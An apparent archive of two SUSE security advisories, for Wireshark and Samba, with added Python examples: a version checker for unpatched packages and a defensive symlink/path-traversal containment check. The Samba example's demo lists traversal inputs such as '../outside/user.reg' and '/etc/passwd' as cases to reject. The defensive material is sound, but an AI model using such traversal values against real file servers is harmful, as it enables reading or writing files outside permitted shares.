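        if x.isdigit() and y.isdigit():
            if int(x) != int(y):
                return 1 if int(x) > int(y) else -1
        elif x.isdigit() != y.isdigit():     # numeric segment beats alphabetic segment
            return 1 if x.isdigit() else -1
        elif x != y:
            return 1 if x > y else -1
    if len(sa) == len(sb):
        return 0
    longer, sign = (sa, 1) if len(sa) > len(sb) else (sb, -1)
    # A leftover '~' segment makes the longer string the *older* one ("1.0~rc1" < "1.0").
    return -sign if longer[min(len(sa), len(sb))] == "~" else sign


def split_nvr(nvr):
    """'name-version-release' -> (name, version, release); names themselves may contain dashes."""
    name, version, release = nvr.rsplit("-", 2)
    return name, version, release


def vr_cmp(vr_a, vr_b):
    """Order (version, release) pairs the way rpm does: version first, then release."""
    c = rpmvercmp(vr_a[0], vr_b[0])
    return c or rpmvercmp(vr_a[1], vr_b[1])


def unpatched(installed, fixed):
    """Return {name: (installed 'v-r', fixed 'v-r')} for every installed package whose
    build is older than the advisory's.  Packages the advisory does not name are ignored."""
    want = {n: (v, r) for n, v, r in map(split_nvr, fixed)}
    stale = {}
    for n, v, r in map(split_nvr, installed):
        if n in want and vr_cmp((v, r), want[n]) < 0:
            stale[n] = (f"{v}-{r}", "-".join(want[n]))
    return stale


# Fixed builds as listed in SUSE-SU-2019:1038-1 for SUSE Linux Enterprise Server 12-SP4.
FIXED = [
    "libwireshark9-2.4.14-48.45.1",
    "libwiretap7-2.4.14-48.45.1",
    "libwscodecs1-2.4.14-48.45.1",
    "libwsutil8-2.4.14-48.45.1",
    "wireshark-2.4.14-48.45.1",
    "wireshark-gtk-2.4.14-48.45.1",
]

# Constructed stand-in for `rpm -qa --queryformat '%{NAME}-%{VERSION}-%{RELEASE}\n'` output:
# two libraries already on the fixed build, two still on an older (invented) build, and one
# package the advisory says nothing about.  None of these versions are real SUSE builds.
INSTALLED = [
    "libwireshark9-2.4.14-48.45.1",
    "libwiretap7-2.4.14-48.45.1",
    "libwscodecs1-2.4.13-48.42.1",
    "wireshark-2.4.13-48.42.1",
    "vim-8.0.1568-5.3.1",
]


if __name__ == "__main__":
    for name, (have, need) in sorted(unpatched(INSTALLED, FIXED).items()):
        print(f"{name}: installed {have}, fixed in {need}")
```

On a real host, feed the output of rpm -qa with the query format shown in the comment into INSTALLED instead of the constructed list; the comparison logic does not change. The same check applies to the other advisories on this page (the samba builds, for instance, carry a +git.154.2998451b912 suffix in the version, which rpmvercmp handles as ordinary alphanumeric segments).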
Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1038=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1038=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1038=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1038=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1038=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1038=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): wireshark-debuginfo-2.4.14-48.45.1 wireshark-debugsource-2.4.14-48.45.1 wireshark-devel-2.4.14-48.45.1 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): wireshark-debuginfo-2.4.14-48.45.1 wireshark-debugsource-2.4.14-48.45.1 wireshark-devel-2.4.14-48.45.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): libwireshark9-2.4.14-48.45.1 libwireshark9-debuginfo-2.4.14-48.45.1 libwiretap7-2.4.14-48.45.1 libwiretap7-debuginfo-2.4.14-48.45.1 libwscodecs1-2.4.14-48.45.1 libwscodecs1-debuginfo-2.4.14-48.45.1 libwsutil8-2.4.14-48.45.1 libwsutil8-debuginfo-2.4.14-48.45.1 wireshark-2.4.14-48.45.1 wireshark-debuginfo-2.4.14-48.45.1 wireshark-debugsource-2.4.14-48.45.1 wireshark-gtk-2.4.14-48.45.1 wireshark-gtk-debuginfo-2.4.14-48.45.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): libwireshark9-2.4.14-48.45.1 libwireshark9-debuginfo-2.4.14-48.45.1 libwiretap7-2.4.14-48.45.1 libwiretap7-debuginfo-2.4.14-48.45.1 libwscodecs1-2.4.14-48.45.1 libwscodecs1-debuginfo-2.4.14-48.45.1 libwsutil8-2.4.14-48.45.1 libwsutil8-debuginfo-2.4.14-48.45.1 wireshark-2.4.14-48.45.1 wireshark-debuginfo-2.4.14-48.45.1 wireshark-debugsource-2.4.14-48.45.1 
  wireshark-gtk-2.4.14-48.45.1
  wireshark-gtk-debuginfo-2.4.14-48.45.1
- SUSE Linux Enterprise Desktop 12-SP4 (x86_64):
  libwireshark9-2.4.14-48.45.1
  libwireshark9-debuginfo-2.4.14-48.45.1
  libwiretap7-2.4.14-48.45.1
  libwiretap7-debuginfo-2.4.14-48.45.1
  libwscodecs1-2.4.14-48.45.1
  libwscodecs1-debuginfo-2.4.14-48.45.1
  libwsutil8-2.4.14-48.45.1
  libwsutil8-debuginfo-2.4.14-48.45.1
  wireshark-2.4.14-48.45.1
  wireshark-debuginfo-2.4.14-48.45.1
  wireshark-debugsource-2.4.14-48.45.1
  wireshark-gtk-2.4.14-48.45.1
  wireshark-gtk-debuginfo-2.4.14-48.45.1
- SUSE Linux Enterprise Desktop 12-SP3 (x86_64):
  libwireshark9-2.4.14-48.45.1
  libwireshark9-debuginfo-2.4.14-48.45.1
  libwiretap7-2.4.14-48.45.1
  libwiretap7-debuginfo-2.4.14-48.45.1
  libwscodecs1-2.4.14-48.45.1
  libwscodecs1-debuginfo-2.4.14-48.45.1
  libwsutil8-2.4.14-48.45.1
  libwsutil8-debuginfo-2.4.14-48.45.1
  wireshark-2.4.14-48.45.1
  wireshark-debuginfo-2.4.14-48.45.1
  wireshark-debugsource-2.4.14-48.45.1
  wireshark-gtk-2.4.14-48.45.1
  wireshark-gtk-debuginfo-2.4.14-48.45.1

References:

https://www.suse.com/security/cve/CVE-2019-10894.html
https://www.suse.com/security/cve/CVE-2019-10895.html
https://www.suse.com/security/cve/CVE-2019-10896.html
https://www.suse.com/security/cve/CVE-2019-10899.html
https://www.suse.com/security/cve/CVE-2019-10901.html
https://www.suse.com/security/cve/CVE-2019-10903.html
https://bugzilla.suse.com/1131945

From sle-security-updates at lists.suse.com Thu Apr 25 10:14:02 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Thu, 25 Apr 2019 18:14:02 +0200 (CEST)
Subject: SUSE-SU-2019:1037-1: moderate: Security update for samba
Message-ID: <20190425161402.9EE47F3D3@maintenance.suse.de>

SUSE Security Update: Security update for samba
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:1037-1
Rating:             moderate
References:         #1099590 #1123755 #1124223 #1127153 #1131060
Cross-References:   CVE-2019-3880
Affected Products:
                    SUSE Linux Enterprise Software Development Kit 12-SP4
                    SUSE Linux Enterprise Software Development Kit 12-SP3
                    SUSE Linux Enterprise Server 12-SP4
                    SUSE Linux Enterprise Server 12-SP3
                    SUSE Linux Enterprise High Availability 12-SP4
                    SUSE Linux Enterprise High Availability 12-SP3
                    SUSE Linux Enterprise Desktop 12-SP4
                    SUSE Linux Enterprise Desktop 12-SP3
                    SUSE Enterprise Storage 5
______________________________________________________________________________

An update that solves one vulnerability and has four fixes is now available.

Description:

This update for samba fixes the following issues:

Security issue fixed:

- CVE-2019-3880: Fixed a path/symlink traversal vulnerability, which allowed an unprivileged user to save registry files outside a share (bsc#1131060).

Non-security issues fixed:

- Fix vfs_ceph ftruncate and fallocate handling (bsc#1127153).
- Abide by load_printers smb.conf parameter (bsc#1124223).
- s3:winbindd: let normalize_name_map() call find_domain_from_name_noinit() (bsc#1123755).
- s3:passdb: Do not return OK if we don't have pinfo set up (bsc#1099590).
- s3:winbind: Fix regression (bsc#1123755).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
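CVE-2019-3880 above is a path/symlink traversal: a client-supplied name let an unprivileged user make the server write a registry file outside the share. The general defence is to resolve the requested path, symlinks included, and refuse it unless the result still lies under the share root; a lexical check for ".." alone does nothing against a symlink that lives inside the share and points out of it. The following is an added example of that check, not Samba code and not the actual fix; the share layout, file names and function names are constructed for the demonstration.

```python
"""Containment check for client-supplied paths on a file share.  Added example,
not Samba's fix: symlinks are resolved first, then the result must still lie
under the share root."""
import os
import tempfile


class EscapesShare(PermissionError):
    """Raised when a requested path would resolve outside the share."""


def safe_share_path(share_root, client_path):
    """Map client_path (relative to the share) to an absolute filesystem path, or
    raise EscapesShare.  Symlinks are followed *before* the containment test, so
    a link inside the share that points outside it is rejected."""
    root = os.path.realpath(share_root)
    rel = client_path.replace("\\", "/")          # SMB clients send backslashes
    if os.path.isabs(rel):
        raise EscapesShare(f"absolute path rejected: {client_path!r}")
    # realpath() resolves every existing component (symlinks included) and collapses
    # '..'; components that do not exist yet are kept as-is.
    resolved = os.path.realpath(os.path.join(root, rel))
    if os.path.commonpath([root, resolved]) != root:
        raise EscapesShare(f"{client_path!r} resolves to {resolved!r}, outside {root!r}")
    return resolved


def save_registry_file(share_root, client_path, data):
    """Write data under the share only if the containment check passes.  O_NOFOLLOW
    and O_EXCL protect the final component against a symlink dropped in after the check."""
    target = safe_share_path(share_root, client_path)
    fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return target


def demo():
    """Constructed scenario: a share containing a symlink that points outside it.
    Returns {requested path: 'allowed' | 'rejected'}."""
    with tempfile.TemporaryDirectory() as tmp:
        share = os.path.join(tmp, "share")
        outside = os.path.join(tmp, "outside")
        os.makedirs(os.path.join(share, "profiles"))
        os.makedirs(outside)
        os.symlink(outside, os.path.join(share, "escape"))                         # leaves the share
        os.symlink(os.path.join(share, "profiles"), os.path.join(share, "alias"))  # stays inside
        requests = [
            "profiles/user1.reg",                 # plain write inside the share
            "alias/user2.reg",                    # via a symlink that stays inside
            "profiles\\user3.reg",                # Windows-style separator
            "escape/user.reg",                    # via a symlink that leaves the share
            "../outside/user.reg",                # classic dot-dot traversal
            "profiles/../../outside/user.reg",    # traversal hidden behind a valid prefix
            "/etc/passwd",                        # absolute path
        ]
        verdict = {}
        for req in requests:
            try:
                save_registry_file(share, req, b"constructed registry data")
                verdict[req] = "allowed"
            except EscapesShare:
                verdict[req] = "rejected"
        return verdict


if __name__ == "__main__":
    for req, v in demo().items():
        print(f"{v:8s} {req}")
```

Resolving and then opening is still a check-then-use sequence: a local user who can create links inside the share can swap a directory for a symlink between the two calls. O_NOFOLLOW only covers the last component, so a daemon that must resist that race should walk the path one component at a time with openat() and O_NOFOLLOW, or use openat2() with RESOLVE_BENEATH on kernels that have it, rather than trust a path string.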
Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1037=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1037=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1037=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1037=1 - SUSE Linux Enterprise High Availability 12-SP4: zypper in -t patch SUSE-SLE-HA-12-SP4-2019-1037=1 - SUSE Linux Enterprise High Availability 12-SP3: zypper in -t patch SUSE-SLE-HA-12-SP3-2019-1037=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1037=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1037=1 - SUSE Enterprise Storage 5: zypper in -t patch SUSE-Storage-5-2019-1037=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): libndr-devel-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac-devel-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt-devel-4.6.16+git.154.2998451b912-3.40.3 libndr-standard-devel-4.6.16+git.154.2998451b912-3.40.3 libsamba-util-devel-4.6.16+git.154.2998451b912-3.40.3 libsmbclient-devel-4.6.16+git.154.2998451b912-3.40.3 libwbclient-devel-4.6.16+git.154.2998451b912-3.40.3 samba-core-devel-4.6.16+git.154.2998451b912-3.40.3 samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debugsource-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): libndr-devel-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac-devel-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt-devel-4.6.16+git.154.2998451b912-3.40.3 libndr-standard-devel-4.6.16+git.154.2998451b912-3.40.3 libsamba-util-devel-4.6.16+git.154.2998451b912-3.40.3 libsmbclient-devel-4.6.16+git.154.2998451b912-3.40.3 
libwbclient-devel-4.6.16+git.154.2998451b912-3.40.3 samba-core-devel-4.6.16+git.154.2998451b912-3.40.3 samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debugsource-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): libdcerpc-binding0-4.6.16+git.154.2998451b912-3.40.3 libdcerpc-binding0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr0-4.6.16+git.154.2998451b912-3.40.3 libndr0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 
libtevent-util0-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-4.6.16+git.154.2998451b912-3.40.3 samba-client-4.6.16+git.154.2998451b912-3.40.3 samba-client-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debugsource-4.6.16+git.154.2998451b912-3.40.3 samba-libs-4.6.16+git.154.2998451b912-3.40.3 samba-libs-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-debuginfo-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Server 12-SP4 (s390x x86_64): libdcerpc-binding0-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc-binding0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-32bit-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-32bit-4.6.16+git.154.2998451b912-3.40.3 
libsamba-passdb0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-32bit-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-32bit-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-client-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-client-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-libs-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-libs-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Server 12-SP4 (noarch): samba-doc-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): libdcerpc-binding0-4.6.16+git.154.2998451b912-3.40.3 libdcerpc-binding0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr0-4.6.16+git.154.2998451b912-3.40.3 
libndr0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-4.6.16+git.154.2998451b912-3.40.3 samba-client-4.6.16+git.154.2998451b912-3.40.3 samba-client-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debugsource-4.6.16+git.154.2998451b912-3.40.3 samba-libs-4.6.16+git.154.2998451b912-3.40.3 samba-libs-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-debuginfo-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Server 12-SP3 (s390x x86_64): libdcerpc-binding0-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc-binding0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 
libdcerpc0-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-32bit-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-32bit-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-32bit-4.6.16+git.154.2998451b912-3.40.3 
      libwbclient0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-client-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-client-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-libs-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-libs-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-winbind-32bit-4.6.16+git.154.2998451b912-3.40.3
      samba-winbind-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3

   - SUSE Linux Enterprise Server 12-SP3 (noarch):

      samba-doc-4.6.16+git.154.2998451b912-3.40.3

   - SUSE Linux Enterprise High Availability 12-SP4 (ppc64le s390x x86_64):

      ctdb-4.6.16+git.154.2998451b912-3.40.3
      ctdb-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      samba-debugsource-4.6.16+git.154.2998451b912-3.40.3

   - SUSE Linux Enterprise High Availability 12-SP3 (ppc64le s390x x86_64):

      ctdb-4.6.16+git.154.2998451b912-3.40.3
      ctdb-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      samba-debugsource-4.6.16+git.154.2998451b912-3.40.3

   - SUSE Linux Enterprise Desktop 12-SP4 (noarch):

      samba-doc-4.6.16+git.154.2998451b912-3.40.3

   - SUSE Linux Enterprise Desktop 12-SP4 (x86_64):

      libdcerpc-binding0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libdcerpc-binding0-4.6.16+git.154.2998451b912-3.40.3
      libdcerpc-binding0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libdcerpc-binding0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libdcerpc0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libdcerpc0-4.6.16+git.154.2998451b912-3.40.3
      libdcerpc0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libdcerpc0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libndr-krb5pac0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libndr-krb5pac0-4.6.16+git.154.2998451b912-3.40.3
      libndr-krb5pac0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libndr-krb5pac0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libndr-nbt0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libndr-nbt0-4.6.16+git.154.2998451b912-3.40.3
      libndr-nbt0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libndr-nbt0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libndr-standard0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libndr-standard0-4.6.16+git.154.2998451b912-3.40.3
      libndr-standard0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libndr-standard0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libndr0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libndr0-4.6.16+git.154.2998451b912-3.40.3
      libndr0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libndr0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libnetapi0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libnetapi0-4.6.16+git.154.2998451b912-3.40.3
      libnetapi0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libnetapi0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsamba-credentials0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-credentials0-4.6.16+git.154.2998451b912-3.40.3
      libsamba-credentials0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-credentials0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
      libsamba-errors0-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-errors0-4.6.16+git.154.2998451b912-3.40.3
      libsamba-errors0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3
      libsamba-errors0-debuginfo-4.6.16+git.154.2998451b912-3.40.3
